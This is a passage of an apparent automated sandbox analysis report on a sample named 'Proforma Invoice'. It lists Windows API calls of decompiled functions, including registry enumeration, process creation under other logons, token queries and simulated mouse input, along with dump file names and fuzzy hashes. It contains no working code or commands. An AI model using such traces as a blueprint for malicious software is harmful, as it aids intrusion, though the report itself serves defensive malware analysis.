                                                                                                  • Part of subcall function 006C3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 006C9F98
                                                                                                  • Part of subcall function 006C3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 006C9FAB
                                                                                                  • Part of subcall function 006C3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 006C9FBE
                                                                                                • __mtinitlocks.LIBCMT ref: 006C9AEB
                                                                                                • __mtterm.LIBCMT ref: 006C9AF4
                                                                                                  • Part of subcall function 006C9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,006C9AF9,006C7CD0,0075A0B8,00000014), ref: 006C9C56
                                                                                                  • Part of subcall function 006C9B5C: _free.LIBCMT ref: 006C9C5D
                                                                                                  • Part of subcall function 006C9B5C: DeleteCriticalSection.KERNEL32(02v,?,?,006C9AF9,006C7CD0,0075A0B8,00000014), ref: 006C9C7F
                                                                                                • __calloc_crt.LIBCMT ref: 006C9B19
                                                                                                • __initptd.LIBCMT ref: 006C9B3B
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 006C9B42
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                • String ID:
                                                                                                • API String ID: 3567560977-0
                                                                                                • Opcode ID: 73ddbe8c03b73d7d8208d2c5091773cfe3962fe861a202982bd1b99b89e2155d
                                                                                                • Instruction ID: febd8e2446a2ccb3aeac06ea47c7be696045d3cfb0c1645d2ca5932c0aa2c147
                                                                                                • Opcode Fuzzy Hash: 73ddbe8c03b73d7d8208d2c5091773cfe3962fe861a202982bd1b99b89e2155d
                                                                                                • Instruction Fuzzy Hash: E9F0C23210971129E7B47A74BC0BFBB3693DF02734F204A1EF014961D2EF50A94105BD
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 0072B644
                                                                                                • _memset.LIBCMT ref: 0072B653
                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00766F20,00766F64), ref: 0072B682
                                                                                                • CloseHandle.KERNEL32 ref: 0072B694
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memset$CloseCreateHandleProcess
                                                                                                • String ID: ov$dov
                                                                                                • API String ID: 3277943733-3865884406
                                                                                                • Opcode ID: c351981e3747ded9e9b52f29349f00c8b799ee7161dcb5185c1f01a20e4daa75
                                                                                                • Instruction ID: 70dafc3995671c5b3a311febef03baeede12586fce4956b3d89cc3277840782f
                                                                                                • Opcode Fuzzy Hash: c351981e3747ded9e9b52f29349f00c8b799ee7161dcb5185c1f01a20e4daa75
                                                                                                • Instruction Fuzzy Hash: 0EF05EB25403007AE2106761BC16FFB7A9DEB18395F408034FE0AE5192D7BA5C0087EC
                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,006C3F85), ref: 006C4085
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 006C408C
                                                                                                • EncodePointer.KERNEL32(00000000), ref: 006C4097
                                                                                                • DecodePointer.KERNEL32(006C3F85), ref: 006C40B2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                • String ID: RoUninitialize$combase.dll
                                                                                                • API String ID: 3489934621-2819208100
                                                                                                • Opcode ID: fb375c2586bd5f3612d4e74cf87a156b1845423493f413245825104ba83d80b3
                                                                                                • Instruction ID: 4090f67fabdd5ce45c7a7a21e869c2e6a249ed4a36264efc2aca990a91e57934
                                                                                                • Opcode Fuzzy Hash: fb375c2586bd5f3612d4e74cf87a156b1845423493f413245825104ba83d80b3
                                                                                                • Instruction Fuzzy Hash: 4AE092B0691704EBEA24AF61ED09B553AB5BB05B42F108138F502E11A2CFBE4602CA1C
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memmove$__itow__swprintf
                                                                                                • String ID:
                                                                                                • API String ID: 3253778849-0
                                                                                                • Opcode ID: 51945d54c3f8c0ccc4411b98a6fdda64bcd9e1a3578c2feb254a5296041c596c
                                                                                                • Instruction ID: cd7f55638dc61e5233b9e42c70093f43d3f6d5a37cf61e2ac16970d2a488c34e
                                                                                                • Opcode Fuzzy Hash: 51945d54c3f8c0ccc4411b98a6fdda64bcd9e1a3578c2feb254a5296041c596c
                                                                                                • Instruction Fuzzy Hash: 56619A3050064AEBDF41EF60CC95EFE77AAAF06308F044A2DF9155B292DA39AD15CB64
                                                                                                APIs
                                                                                                  • Part of subcall function 006A7DE1: _memmove.LIBCMT ref: 006A7E22
                                                                                                  • Part of subcall function 00720E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0071FDAD,?,?), ref: 00720E31
                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007202BD
                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007202FD
                                                                                                • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00720320
                                                                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00720349
                                                                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0072038C
                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00720399
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                • String ID:
                                                                                                • API String ID: 4046560759-0
                                                                                                • Opcode ID: 99e14973c4c0f4cd62df379b90c0c4716e948c0df38af2f96565cb49ba2af38e
                                                                                                • Instruction ID: ff1368f1979aa51d6de2bd87a531e7834d891117a5953cb63723aa437e7f7b9e
                                                                                                • Opcode Fuzzy Hash: 99e14973c4c0f4cd62df379b90c0c4716e948c0df38af2f96565cb49ba2af38e
                                                                                                • Instruction Fuzzy Hash: A6514831108204AFC714EF64D885EAFBBEAFF85314F04492DF5459B2A2DB35E905CBA6
                                                                                                APIs
                                                                                                • GetMenu.USER32(?), ref: 007257FB
                                                                                                • GetMenuItemCount.USER32(00000000), ref: 00725832
                                                                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0072585A
                                                                                                • GetMenuItemID.USER32(?,?), ref: 007258C9
                                                                                                • GetSubMenu.USER32(?,?), ref: 007258D7
                                                                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 00725928
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Menu$Item$CountMessagePostString
                                                                                                • String ID:
                                                                                                • API String ID: 650687236-0
                                                                                                • Opcode ID: 7b3ac7c128b031e061679d0f99b82bc6c4a7e84a535c2c2f33fbebb03b0c0510
                                                                                                • Instruction ID: 0501d02ec591f8ac6c3d317bd05842b0e7cf718bb39576619e26a16a1b23ea57
                                                                                                • Opcode Fuzzy Hash: 7b3ac7c128b031e061679d0f99b82bc6c4a7e84a535c2c2f33fbebb03b0c0510
                                                                                                • Instruction Fuzzy Hash: 48515D35E00625EFDF11EF64D845AAEB7B5EF49320F104469E842BB351CB78AE41CB94
                                                                                                APIs
                                                                                                • VariantInit.OLEAUT32(?), ref: 006FEF06
                                                                                                • VariantClear.OLEAUT32(00000013), ref: 006FEF78
                                                                                                • VariantClear.OLEAUT32(00000000), ref: 006FEFD3
                                                                                                • _memmove.LIBCMT ref: 006FEFFD
                                                                                                • VariantClear.OLEAUT32(?), ref: 006FF04A
                                                                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 006FF078
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                • String ID:
                                                                                                • API String ID: 1101466143-0
                                                                                                • Opcode ID: 92102f3521ac2f44a9efe83c5336a7396fda52baef856c194c410a43ca20cf3b
                                                                                                • Instruction ID: a8d3a5e5f35611c3805d6a2cbe44ac0a66837b21dae1fd62ecc90056fc672a11
                                                                                                • Opcode Fuzzy Hash: 92102f3521ac2f44a9efe83c5336a7396fda52baef856c194c410a43ca20cf3b
                                                                                                • Instruction Fuzzy Hash: 5A5179B5A00209EFDB10DF58C890AAAB7B9FF4C310B158569EE49DB301E735E911CBA0
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 00702258
                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007022A3
                                                                                                • IsMenu.USER32(00000000), ref: 007022C3
                                                                                                • CreatePopupMenu.USER32 ref: 007022F7
                                                                                                • GetMenuItemCount.USER32(000000FF), ref: 00702355
                                                                                                • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00702386
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                • String ID:
                                                                                                • API String ID: 3311875123-0
                                                                                                • Opcode ID: c0b061a1da76794285b9dd2d972a29a6db8f641c6fc3041c525766f040456bb0
                                                                                                • Instruction ID: fc3516f2436f3006ffaa42e182fd19b803b1328fbee3788f6bf31cfda379aa3b
                                                                                                • Opcode Fuzzy Hash: c0b061a1da76794285b9dd2d972a29a6db8f641c6fc3041c525766f040456bb0
                                                                                                • Instruction Fuzzy Hash: 41519B72600209DBDF21CF68C88CBAEFBF5AF05314F148229E855A72D2D7789906CB51
                                                                                                APIs
                                                                                                  • Part of subcall function 006A2612: GetWindowLongW.USER32(?,000000EB), ref: 006A2623
                                                                                                • BeginPaint.USER32(?,?,?,?,?,?), ref: 006A179A
                                                                                                • GetWindowRect.USER32(?,?), ref: 006A17FE
                                                                                                • ScreenToClient.USER32(?,?), ref: 006A181B
                                                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 006A182C
                                                                                                • EndPaint.USER32(?,?), ref: 006A1876
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                • String ID:
                                                                                                • API String ID: 1827037458-0
                                                                                                • Opcode ID: a003ffd6fc7ceebc5116f7cd0f377ff563698878332430157858fec150110286
                                                                                                • Instruction ID: b30a54c4df68446a0300239e94e118fb2d324cfa41dbc64e07006ef8898962c8
                                                                                                • Opcode Fuzzy Hash: a003ffd6fc7ceebc5116f7cd0f377ff563698878332430157858fec150110286
                                                                                                • Instruction Fuzzy Hash: CD418E30504701DFD720EF24CC84BBA7BE9EB46724F044669F9A58B2A1C7749C46EB65
                                                                                                APIs
                                                                                                • ShowWindow.USER32(007657B0,00000000,011A5670,?,?,007657B0,?,0072B5A8,?,?), ref: 0072B712
                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 0072B736
                                                                                                • ShowWindow.USER32(007657B0,00000000,011A5670,?,?,007657B0,?,0072B5A8,?,?), ref: 0072B796
                                                                                                • ShowWindow.USER32(00000000,00000004,?,0072B5A8,?,?), ref: 0072B7A8
                                                                                                • EnableWindow.USER32(00000000,00000001), ref: 0072B7CC
                                                                                                • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0072B7EF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Show$Enable$MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 642888154-0
                                                                                                • Opcode ID: b82460103dcb77b352b18868a865cfc397d0ed6b21a18567a17856febc010ccc
                                                                                                • Instruction ID: 8c9fa92062208cb4e35178827aff389e6ba0b114333f045810db15a24a2460ce
                                                                                                • Opcode Fuzzy Hash: b82460103dcb77b352b18868a865cfc397d0ed6b21a18567a17856febc010ccc
                                                                                                • Instruction Fuzzy Hash: 90417F34600251EFDB26CF24E499B957BF1FF45310F5881BAE9488F7A2C739A85ACB50
                                                                                                APIs
                                                                                                • GetForegroundWindow.USER32(?,?,?,?,?,?,00714E41,?,?,00000000,00000001), ref: 007170AC
                                                                                                  • Part of subcall function 007139A0: GetWindowRect.USER32(?,?), ref: 007139B3
                                                                                                • GetDesktopWindow.USER32 ref: 007170D6
                                                                                                • GetWindowRect.USER32(00000000), ref: 007170DD
                                                                                                • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0071710F
                                                                                                  • Part of subcall function 00705244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007052BC
                                                                                                • GetCursorPos.USER32(?), ref: 0071713B
                                                                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00717199
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                • String ID:
                                                                                                • API String ID: 4137160315-0
                                                                                                • Opcode ID: 11c97faccbffcb77a3cbc83a4943a8cc4117b9cb2b0b08af1eac19e32b65cda8
                                                                                                • Instruction ID: b5915181ebf3999533ef006706a780b99437bd2f8a04bc01a938c0025f6f3b81
                                                                                                • Opcode Fuzzy Hash: 11c97faccbffcb77a3cbc83a4943a8cc4117b9cb2b0b08af1eac19e32b65cda8
                                                                                                • Instruction Fuzzy Hash: 7D31D272509309ABD724DF18C849F9BB7E9FFC8314F000929F585971D1C678EA49CB96
                                                                                                APIs
                                                                                                  • Part of subcall function 006F80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 006F80C0
                                                                                                  • Part of subcall function 006F80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 006F80CA
                                                                                                  • Part of subcall function 006F80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 006F80D9
                                                                                                  • Part of subcall function 006F80A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 006F80E0
                                                                                                  • Part of subcall function 006F80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 006F80F6
                                                                                                • GetLengthSid.ADVAPI32(?,00000000,006F842F), ref: 006F88CA
                                                                                                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 006F88D6
                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 006F88DD
                                                                                                • CopySid.ADVAPI32(00000000,00000000,?), ref: 006F88F6
                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,006F842F), ref: 006F890A
                                                                                                • HeapFree.KERNEL32(00000000), ref: 006F8911
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                • String ID:
                                                                                                • API String ID: 3008561057-0
                                                                                                • Opcode ID: 140c6aba413c35aef5fc26d8bcebccbec97f6614a249721e6779bec24d55988f
                                                                                                • Instruction ID: 28180bfff2708facbac7b8e396d7b6bb2497063a9e26e97154be98e57f79eb06
                                                                                                • Opcode Fuzzy Hash: 140c6aba413c35aef5fc26d8bcebccbec97f6614a249721e6779bec24d55988f
                                                                                                • Instruction Fuzzy Hash: 5011AC3160120DFFDB209FA8DC0ABBE7BBAEB45311F5080A8E98597210CB769D11DB60
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 006F85E2
                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 006F85E9
                                                                                                • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 006F85F8
                                                                                                • CloseHandle.KERNEL32(00000004), ref: 006F8603
                                                                                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 006F8632
                                                                                                • DestroyEnvironmentBlock.USERENV(00000000), ref: 006F8646
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                • String ID:
                                                                                                • API String ID: 1413079979-0
                                                                                                • Opcode ID: bbbc6e1e50feecdb92ba4a8d287a238e46723da92f43be932d622e531cc42723
                                                                                                • Instruction ID: 822bb9241d11aeaa6f6c76c84ff3110cf45bd96540442127ab2c2dc7e1c280e9
                                                                                                • Opcode Fuzzy Hash: bbbc6e1e50feecdb92ba4a8d287a238e46723da92f43be932d622e531cc42723
                                                                                                • Instruction Fuzzy Hash: 5E11477250024DAFDF118FA4DD49FEE7BBAEB48704F048065FE04A2261C6768D61AB64
                                                                                                APIs
                                                                                                • GetDC.USER32(00000000), ref: 006FB7B5
                                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 006FB7C6
                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 006FB7CD
                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 006FB7D5
                                                                                                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 006FB7EC
                                                                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 006FB7FE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: CapsDevice$Release
                                                                                                • String ID:
                                                                                                • API String ID: 1035833867-0
                                                                                                • Opcode ID: a0500e45035d00de6ac0daba7c6bf9181447197f4d03a5462997406725b4eeec
                                                                                                • Instruction ID: 09bedc7c8cf416d47b3d764c8a707c3376cf78b9c5dd7cef692737cde9396b6f
                                                                                                • Opcode Fuzzy Hash: a0500e45035d00de6ac0daba7c6bf9181447197f4d03a5462997406725b4eeec
                                                                                                • Instruction Fuzzy Hash: DE018475E00209BBEB20ABA6DD45E5EBFB8EB48311F008076FA04A7291D6309C11CF95
                                                                                                APIs
                                                                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 006C0193
                                                                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 006C019B
                                                                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 006C01A6
                                                                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 006C01B1
                                                                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 006C01B9
                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 006C01C1
                                                                                                Memory Dump Source
